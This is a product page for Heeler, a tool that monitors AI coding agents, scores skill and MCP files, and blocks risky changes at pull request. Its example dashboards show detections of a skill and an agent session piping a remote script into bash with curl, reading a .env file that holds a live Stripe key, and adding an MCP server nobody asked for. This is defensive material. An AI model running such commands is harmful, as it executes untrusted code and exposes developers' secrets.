Operate · Coding agents

Secure what your coding agents are told, run and change.

Heeler flags risky actions in agent sessions, blocks risky agent files at the pull request, and traces production back to the prompt.

Agents

Every coding agent, on every machine.

The Workstation Sensor reports the agents, skills, MCP servers and hooks on each machine.

smart_toyClaude Code, Codex, Cursor, OpenCode, Copilot Chat
differenceChanges since the last snapshot
key_offMCP credentials stripped before upload
Workstations214 reporting
WorkstationUserAgentsSkillsMCPWorst score
laptop-0142mleeClaude CodeCursor12491
laptop-0219rpatelClaude Code19728
laptop-0377jchenCodex6288
laptop-0408skimCopilot Chat3195
laptop-0219 · changes since the last snapshot+ skillrelease-helper+ MCP serverstripe-admin · remote
What agents load

Skills, hooks and MCP configs, scored.

Every agent file gets a safety score from 0 to 100 and an assessed intent.

ruleDeterministic rules plus model review
publicExternal hosts rated by reputation
blockRisky new files blocked at the PR
.claude/skills/release-helper/SKILL.mdAt Risk
28of 100
Assessed intentSuspiciousHigh confidence
Static risk
LLM risk
External risk
HighInsecure Shell Pipecurl -s https://get.toolcdn.io/i.sh | bash
ModelRemote Code Execution
InfoReferenced External System · toolcdn.io, unrecognized
blockPR Guardrails · Agent File Static FindingsBlock
Sessions

Catch risky agent actions at the step they happen.

Heeler checks every step of an agent session: the commands it runs, the output it reads, and whether the developer asked for it.

keySecrets, credential access and remote scripts
blockDestructive commands and injected instructions
ruleActions the developer never asked for
Add retries to the payment clientSession
smart_toyClaude Codecomputerlaptop-0142 · mleefolderacme/payments-api
OverviewConversationSkillsCommitsSub-agentsDetections 3
Add retries with backoff to the payment client
terminalBash cat .envtool output
key
Secret exposed in tool outputStripe live key · fingerprint stored, value withheld
High
terminalBash curl -sL get.toolcdn.io/i.sh | bash
block
Remote script piped into a shellCode the developer did not write
High
editEdit .mcp.json+1 server
rule
MCP server added that no one asked forConfig change · not requested by the user
High
commitgit commit a41c9e2feature/payment-retry
42Tool invocations
3Detections
a41c9e2Commit
Provenance

Trace what is running back to the prompt that built it.

Pick any service running in production. Heeler shows the image, commit, agent session, prompt and developer behind it.

cloud
Runningpayments-apiprod-us · ECS · Internet accessible
deployed_code
Imagepayments-api:a41c9e2source revision a41c9e2
commit
Commita41c9e2acme/payments-api · Team Payments
smart_toy
Agent sessionClaude Code42 tool callsView the conversation
forum
Prompt"Add retries with backoff to the payment client"
person
Developermleelaptop-0142, guided the agent
Incident responseWhat changed in production?Commit a41c9e2written by Claude Code, running in prod-us
Audit and provenanceWhich prompt produced it?mlee's session"Add retries with backoff", conversation on record
Fix routingWho fixes it?Team Paymentsowner of acme/payments-api

How it deploys

DeployPush with your MDMmacOS and Windows. A deployment token enrolls each machine.
RunRuns as a background serviceWatches agent sessions and uploads changes.
ReviewResults appear in HeelerSessions, workstations and posture, for admins.
Agent files

In the repo, from pull request on.

Identify risky agent files in your repos.

Heeler evaluates each connected repository for the files your agents follow.

  • Scan each repository
  • Find instructions, skills, hooks and MCP config
  • Score each file 0 to 100. Below 70 is At Risk

Gate new and changed agent files on the pull request.

Observe, warn or block. The same check runs in CI.

Explore PR Guardrails

Route each new at-risk agent file to its owner.

A workflow posts to Slack or opens a Jira, Linear or GitHub ticket.

Explore Autonomous Operations
In the repo and on the workstation

The same score for agent files, wherever Heeler finds them.

Show the evidence behind each score.

Rules, a model's read of intent, and the hosts it reaches. Same content, same score.

Prevent

Where Heeler meets the coding agent.

Agent Skills →Coding agentClaude Code · Codex · CursorOpenCode · VS Code (Copilot)Guided as it writesMCP · AGENT SKILLSAgent Skills →PromptTool callsshell · skills · MCPDiffSecret in a promptDangerous actionInjected instructionWORKSTATION SENSOR · AS THE AGENT ACTSON THIS PAGEHeeler CLI →CommitCommit blockedHEELER CLIHeeler CLI →Pull requestthe merge gateGated at mergePR GUARDRAILSON THIS PAGE

Purpose-built for the AI SDLC

Know what your coding agents are told and what they do.